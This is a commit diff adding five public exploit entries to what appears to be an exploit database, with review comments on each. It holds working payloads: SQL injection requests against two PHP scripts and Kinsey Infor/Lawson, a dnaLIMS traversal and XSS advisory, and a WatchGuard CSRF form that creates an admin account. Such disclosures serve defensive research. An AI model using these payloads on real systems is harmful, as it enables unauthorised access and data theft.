DB: 2017-03-11
5 new exploits

Price Comparison Script 2017.1.8 - SQL Injection
Clickbank Affiliate Marketplace Script 2017 - SQL Injection
Kinsey Infor/Lawson / ESBUS - SQL Injection
WatchGuard XTMv 11.12 Build 516911 - User Management Cross-Site Request Forgery
dnaLIMS DNA Sequencing - Directory Traversal / Session Hijacking / Cross-Site Scripting
parent 6e7ec5be32
commit f2327bc214
6 changed files with 372 additions and 0 deletions
@ -37488,3 +37488,8 @@ id,file,description,date,author,platform,type,port
41572,platforms/hardware/webapps/41572.txt,"ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Session Stealing",2017-03-08,"Bruno Bierbaumer",hardware,webapps,0
41573,platforms/hardware/webapps/41573.txt,"ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Remote Code Execution",2017-03-08,"Bruno Bierbaumer",hardware,webapps,0
41574,platforms/xml/webapps/41574.html,"FTP Voyager Scheduler 16.2.0 - Cross-Site Request Forgery",2017-03-10,hyp3rlinx,xml,webapps,52986
41575,platforms/php/webapps/41575.txt,"Price Comparison Script 2017.1.8 - SQL Injection",2017-03-10,"Ihsan Sencan",php,webapps,0
41576,platforms/php/webapps/41576.txt,"Clickbank Affiliate Marketplace Script 2017 - SQL Injection",2017-03-10,"Ihsan Sencan",php,webapps,0
41577,platforms/jsp/webapps/41577.txt,"Kinsey Infor/Lawson / ESBUS - SQL Injection",2017-03-10,"Michael Benich",jsp,webapps,0
41579,platforms/xml/webapps/41579.html,"WatchGuard XTMv 11.12 Build 516911 - User Management Cross-Site Request Forgery",2017-03-10,KoreLogic,xml,webapps,0
41578,platforms/cgi/webapps/41578.txt,"dnaLIMS DNA Sequencing - Directory Traversal / Session Hijacking / Cross-Site Scripting",2017-03-10,"Shorebreak Security",cgi,webapps,0
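Review bot: The added rows are out of id order: 41579 (WatchGuard) is inserted before 41578 (dnaLIMS), while every surrounding row of this CSV ascends by id; swap the two rows so the file stays sorted and later merges of the CSV stay clean. The description for 41577 ("Kinsey Infor/Lawson / ESBUS - SQL Injection") also drops the "Multiple" from the exploit file's own title ("Kinsey Infor / Lawson (ESBUS) - Multiple SQL Injections"); align the two so a search on either wording finds the entry.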
114
platforms/cgi/webapps/41578.txt
Executable file
@ -0,0 +1,114 @@
Title: Multiple vulnerabilities discovered in dnaLIMS DNA sequencing
web-application
Advisory URL: https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/
Date published: Mar 08, 2017
Vendor: dnaTools, Inc.
CVE IDs: [2017-6526, 2017-6527, 2017-6528, 2017-6529]
USCERT VU: 929263

Vulnerability Summaries
1) Improperly protected web shell [CVE-2017-6526]
dnaLIMS requires authentication to view cgi-bin/dna/sysAdmin.cgi, which is
a web shell included with the software running as the web user. However,
sending a POST request to that page bypasses authentication checks,
including the UID parameter within the POST request.

2) Unauthenticated Directory Traversal [CVE-2017-6527]
The viewAppletFsa.cgi seqID parameter is vulnerable to a null terminated
directory traversal attack. This allows an unauthenticated attacker to
retrieve files on the operating system accessible by the permissions of the
web server. This page also does not require authentication, allowing any
person on the Internet to exploit this vulnerability.

3) Insecure Password Storage [CVE-2017-6528]
An option, which is most likely the default, allows the password file
(/home/dna/spool/.pfile) to store clear text passwords. When combined with
the unauthenticated directory traversal vulnerability, it is possible to
gain the username and password for all users of the software and gain
complete control of the software.

4) Session Hijacking [CVE-2017-6529]
Each user of the dnaLIMS software is assigned a unique four-digit user
identification number(UID) upon account creation. These numbers appear to
be assigned sequentially. Multiple pages of the dnaLIMS application require
that this UID be passed as a URL parameter in order to view the content of
the page.
Consider the following example:
The URL ahttp://<SERVER NAME
REDACTED>/cgi-bin/dna/seqreq2N.cgi?username=61685578,2410a is a valid URL
to view the page for sequencing requests for the user with the UID of 2410. The
username parameter of the URL is the mechanism for authentication to the
system. The first eight-digit number of the username parameter appears to
be a session identifier as it changes every time the user logs in from the
password.cgi page, however this value is not checked by the seqreq2N.cgi
page. This allows an attacker to guess the four-digit UID of valid user
accounts that have an active session. The user with the UID of 2419
currently has an active session, so we can simply hijack this useras
session by requesting this page and specifying the UID 2419.

5) Cross-site Scripting
The seqID parameter of the viewAppletFsa.cgi page is vulnerable to a
reflected cross site scripting attack via GET request as seen in the
following URL:
http://<SERVER NAME REDACTED>/cgi-bin/dna/viewAppletFsa.cgi?seqID=7415-7<SCRIPT
Alert("XSS") </SCRIPT>

6) Cross-site Scripting
The navUserName parameter of the seqTable*.cgi page is vulnerable to a
reflected cross site scripting attack via POST request as seen in the
example below. The * reflects a short name for a client, (ie Shorebreak
Security may be seqTableSS.cgi or seqTableshorebreak.cgi) and may not be
vulnerable for all dnaLIMS installs.

7) Improperly Protected Content

Many of the pages within the admin interface are not properly protected
from viewing by authenticated users. This can give an attacker additional
system information about the system, or change system/software
configuration.

Software was conducted on a live production system, therefore the pages
themselves were tested, forms within these pages were not.

This is also not an exhaustive list of improperly protected pages:

cgi-bin/dna/configuration.cgi

cgi-bin/dna/createCoInfo.cgi

cgi-bin/dna/configSystem.cgi

cgi-bin/dna/combineAcctsN.cgi

Disclosure Timeline

Thu, Nov 10, 2016 at 4:25 PM: Reached out to vendor requesting PGP key to
securely exchange details of vulnerabilities identified

Thu, Nov 10, 2016 at 4:55 PM: Vendor requests report be physically mailed
to PO box via Postal Service

Wed, Nov 16, 2016, at 11:14 AM: Report mailed to vendor via USPS Certified
Mail

Thu, Dec 8, 2016, at 10:43 AM: Request Vendor acknowledge receipt of the
report

Thu, Dec 8, 2016, at 12:53 PM: Vendor acknowledges receiptI3/4 suggests
placing the software behind a firewall as a solution to the vulnerabilities.

Thu, Dec 8, 2016, at 1:54 PM: Reply that the offered solution mitigates
some risk, but does not address the vulnerabilitiesI3/4 inquire if there is a
plan to address the vulnerabilities

Thu, Dec 8, 2016, at 3:13 PM: Vendor replies aa|Yes, we have a plan. Please
gather a DNA sequence, PO Number, or Fund Number and go to your local
grocery store and see what it will buy you.a

Tue, Feb 28, 2017, at 1:15 PM: Vulnerabilities disclosed to US-CERT

Tue, Mar 7, 2017, at 8:19 AM: Vulnerabilities submitted to MITRE for CVE
assignment

Wed, Mar 8, 2017, at 12:00 PM: Vulnerabilities disclosed publicly
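Review bot: Item 6 promises a POST example ("as seen in the example below") that never appears in the file, and items 5 to 7 carry no CVE although the header lists only four ids; add the missing example or drop the reference, and say whether 5 to 7 are covered by one of the listed CVEs. The file also carries mojibake from a mis-encoded export where quotes, apostrophes and semicolons should be ("ahttp://...2410a", "useras", "receiptI3/4", "aa|Yes ... you.a"); re-save it as plain ASCII/UTF-8 before it is committed. Two wording slips: "Software was conducted on a live production system" reads as "Testing was conducted", and item 7's "not properly protected from viewing by authenticated users" presumably means unauthenticated users, since authenticated viewing is the intended behaviour for an admin interface.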
40
platforms/jsp/webapps/41577.txt
Executable file
@ -0,0 +1,40 @@
##################################################################
# Exploit Title: Kinsey Infor / Lawson (ESBUS) - Multiple SQL Injections
##################################################################
# Date: 3/10/2017
##################################################################
# Exploit Author: Michael Benich
##################################################################
# Vendor homepage: http://www.kinsey.com/infor-lawson.html
##################################################################
# Version: ALL
##################################################################
# Tested on: Windows Server 2008 R2; MySQL ver 5.5
##################################################################
# CVE: CVE-2017-6550
##################################################################

Kinsey's Infor-Lawson application (formerly ESBUS) is vulnerable to SQL injection in at least two parameters:

1) TABLE parameter, PoC below

GET /esbus/servlet/GetSQLData?SCHEMA=ESBUS_INTERNAL&TABLE=SCHEDULEDTASKS UNION ALL SELECT <<ATTACKER INPUT>>&FIELD=LASTRUN&NOHEADER=1&SELECT=CLASS=com.esbus.appliance.SOD_PolicyCheck_SystemRun_TimerTask&OUT=XML HTTP/1.1

2) Query POST parameter

POST /KK_LS9ReportingPortal/GetData?SERVERID=%27;LSF_PROD& HTTP/1.1

<--snip--http headers-->

QUERY=1 AND SLEEP(5) AND ('foo'='foo')) &OUT=TAB

A JSP webshell can then be written to the /esbus/ directory.
##################################################################
Timeline:

12/1/2016 - Contacted generic security emails
12/1/2016 - Received response from vendor ("Thanks for the info...")
2/27/2017 - Followed up with contact and intent to disclose. No reply.
3/10/2017 - Disclosure
##################################################################
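Review bot: "# Version: ALL" is an assertion, not a tested version; "Tested on" names only the OS and MySQL 5.5, so state the Infor-Lawson release the two PoCs were confirmed against. The closing line "A JSP webshell can then be written to the /esbus/ directory" is not supported by anything shown (the first PoC is a UNION placeholder, the second a time-based SLEEP check); either document what that outcome depends on or remove it, because as written it overstates the evidence in the file. The second PoC also carries a %27 in the SERVERID query parameter that the heading "2) Query POST parameter" never explains; say whether SERVERID is a third injection point or incidental to the capture.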
22
platforms/php/webapps/41575.txt
Executable file
@ -0,0 +1,22 @@
# # # # #
# Exploit Title: Price Comparison Script v2017.1.8 - SQL Injection
# Google Dork: N/A
# Date: 10.03.2017
# Vendor Homepage: https://www.axisitp.com/
# Software: https://www.axisitp.com/price-comparison-script.php
# Demo: http://www.pricecomparisonscript.info/
# Version: 2017.1.8
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/merchantratings.php?merchantid=[SQL]
# http://localhost/[PATH]/compare.php?pid=[SQL]
# For example;
# -100'+/*!50000union*/+select+1,2,3,4,0x496873616e2053656e63616e203c62723e207777772e696873616e2e6e6574,6,database(),8,9,10,11,12,13,14,15,16,17,18,19,20--+-
# axisitp_newpcs
# Etc..
# # # # #
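Review bot: The example payload under "For example;" is not tied to either of the two listed URLs, so a reader cannot tell whether the 20-column UNION and the returned database name "axisitp_newpcs" belong to merchantratings.php?merchantid or to compare.php?pid; label the example with the parameter it was run against, and give some evidence for the second URL, which currently has none. "Tested on: Win7 x64, Kali Linux x64" names the client operating systems, but the detail that matters for verification is the DBMS, since the /*!50000union*/ version-comment form is MySQL-specific.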
18
platforms/php/webapps/41576.txt
Executable file
@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Clickbank Affiliate Marketplace Script v2017 - SQL Injection
# Google Dork: N/A
# Date: 10.03.2017
# Vendor Homepage: https://www.axisitp.com/
# Software: https://www.axisitp.com/clickbank-affiliate-marketplace-script.php
# Demo: http://www.clickbank.axisitp.com/
# Version: 2017
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/merchantratings.php?merchantid=[SQL]
# Etc..
# # # # #
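Review bot: No evidence accompanies the single URL pattern merchantratings.php?merchantid=[SQL]; unlike 41575 from the same vendor, this file gives no example payload, error message or extracted value, and "Etc.." hints at further parameters that are never named. Add the observed result for merchantid and list any other affected parameters, otherwise the entry cannot be verified against a copy of the script. "Version: 2017" should also be the specific release that was tested, as 41575 does with 2017.1.8.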
173
platforms/xml/webapps/41579.html
Executable file
@ -0,0 +1,173 @@
<!--
KL-001-2017-004 : WatchGuard XTMv User Management Cross-Site Request Forgery

Title: WatchGuard XTMv User Management Cross-Site Request Forgery
Advisory ID: KL-001-2017-004
Publication Date: 2017.03.10
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-004.txt


1. Vulnerability Details

Affected Vendor: WatchGuard
Affected Product: XTMv
Affected Version: v11.12 Build 516911
Platform: Embedded Linux
CWE Classification: CWE-352: Cross-Site Request Forgery (CSRF)
Impact: Privileged Access
Attack vector: HTTP

2. Vulnerability Description

Lack of CSRF protection in the Add User functionality of the
XTMv management portal can be leveraged to create arbitrary
administrator-level accounts.

3. Technical Description

As observed below, no CSRF token is in use when adding a new
user to the management portal.

POST /put_data/ HTTP/1.1
Host: 1.3.3.7:8080
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 365
Cookie: session_id=50f607247265897581a407bfb8b75e30d2b77287
DNT: 1
Connection: close


{"__class__":"PageSystemManageAdminUsersObj","__module__":"modules.scripts.page.system.PageSystemManageAdminUsersObj","users":[],"add_entries":[{"__class__":"AdminUserObj","__module__":"modules.scripts.vo.AdminUserObj","name":"hacked","domain":"Firebox-DB","role":"Device
Administrator","hash":"hacked","enabled":1,"rowindex":-1}],"upd_entries":[],"del_entries":[]}

The HTTP response indicates that the changes were successful.

HTTP/1.1 200 OK
X-Frame-Options: SAMEORIGIN
Content-Length: 68
Expires: Sun, 28 Jan 2007 00:00:00 GMT
Vary: Accept-Encoding
Server: CherryPy/3.6.0
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Date: Sat, 10 Dec 2016 18:08:22 GMT
Content-Type: application/json
Set-Cookie: session_id=50f607247265897581a407bfb8b75e30d2b77287; expires=Sat, 10 Dec 2016 19:08:22 GMT; httponly;
Path=/; secure
Connection: close

{"status": true, "message": ["The changes were saved successfully"]}

Now, the newly created backdoor account can be accessed.

POST /agent/login HTTP/1.1
Host: 1.3.3.7:8080
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: text/xml
X-Requested-With: XMLHttpRequest
Content-Length: 414
Cookie: sessionid=515F007C5BD062C2122008544DB127F80000000C; session_id=0a3d24668f5c3b2c7ba7016d179f5f574e1aaf53
DNT: 1
Connection: close


<methodCall><methodName>login</methodName><params><param><value><struct><member><name>password</name><value><string>hacked</string></value></member><member><name>user</name><value><string>hacked</string></value></member><member><name>domain</name><value><string>Firebox-DB</string></value></member><member><name>uitype</name><value><string>2</string></value></member></struct></value></param></params></methodCall>

The response below shows the application issuing an authenticated
session cookie.

HTTP/1.1 200 OK
X-Frame-Options: SAMEORIGIN
Content-type: text/xml
Set-Cookie: sessionid=74B0DC5119495CFF2AE8944A625558EC00000008;secure;HttpOnly
Connection: close
Date: Sat, 10 Dec 2016 19:55:26 GMT
Server: none
Content-Length: 751

<?xml version="1.0"?>
<methodResponse>
<params>
<param>
<value>
<struct>
<member><name>sid</name><value>74B0DC5119495CFF2AE8944A625558EC00000008</value></member>
<member><name>response</name><value></value></member>
<member>
<name>readwrite</name>
<value><struct>
<member><name>privilege</name><value>2</value></member>
<member><name>peer_sid</name><value>0</value></member>
<member><name>peer_name</name><value>error</value></member>
<member><name>peer_ip</name><value>0.0.0.0</value></member>
</struct></value>
</member>
</struct>
</value>
</param>
</params>
</methodResponse>

4. Mitigation and Remediation Recommendation

The vendor has remediated this vulnerability in WatchGuard
XTMv v11.12.1. Release notes and upgrade instructions are
available at:

https://www.watchguard.com/support/release-notes/fireware/11/en-US/EN_ReleaseNotes_Fireware_11_12_1/index.html

5. Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc. and Joshua Hardin.

6. Disclosure Timeline

2017.01.13 - KoreLogic sends vulnerability report and PoC to
WatchGuard.
2017.01.13 - WatchGuard acknowledges receipt of report.
2017.01.23 - WatchGuard informs KoreLogic that the
vulnerability will be addressed in the forthcoming
v11.12.1 firmware, scheduled for general
availability on or around 2017.02.21.
2017.02.22 - WatchGuard releases v11.12.1.
2017.03.10 - KoreLogic public disclosure.

7. Proof of Concept
-->

<html>
<body>
<form action="https://1.3.3.7:8080/put_data/" method="POST" enctype="text/plain">
<input type="hidden"
name="{"__class__":"PageSystemManageAdminUsersObj","__module__":"modules.scripts.page.system.PageSystemManageAdminUsersObj","users":[],"add_entries":[{"__class__":"AdminUserObj","__module__":"modules.scripts.vo.AdminUserObj","name":"hacked3","domain":"Firebox-DB","role":"Device Administrator","hash":"hacked3","enabled":1,"rowindex":-1}],"upd_entries":[],"del_entries":[]}"
value="" />
<input type="submit" value="Trigger" />
</form>
</body>
</html>

<!--
The contents of this advisory are copyright(c) 2017
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
-->
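Review bot: Section 3 stops at "no CSRF token is in use", but the capture shows a second missing server-side control that the description should name: the legitimate client sends Content-Type: application/json with X-Requested-With: XMLHttpRequest, while the section 7 form submits the same JSON with enctype="text/plain", so /put_data/ evidently accepts the body without checking either header. That is the condition that makes a plain HTML form sufficient, and it is the useful detail for readers defending similar CherryPy endpoints: a strict Content-Type check (which forces a CORS preflight for cross-origin JSON) or an anti-CSRF token would each close it, whereas the secure and httponly flags visible on session_id in the response do nothing against CSRF. Section 4 only links the v11.12.1 release notes; it should say which of these controls the fix applies. Minor inconsistency: the capture creates the account "hacked" while the PoC form creates "hacked3".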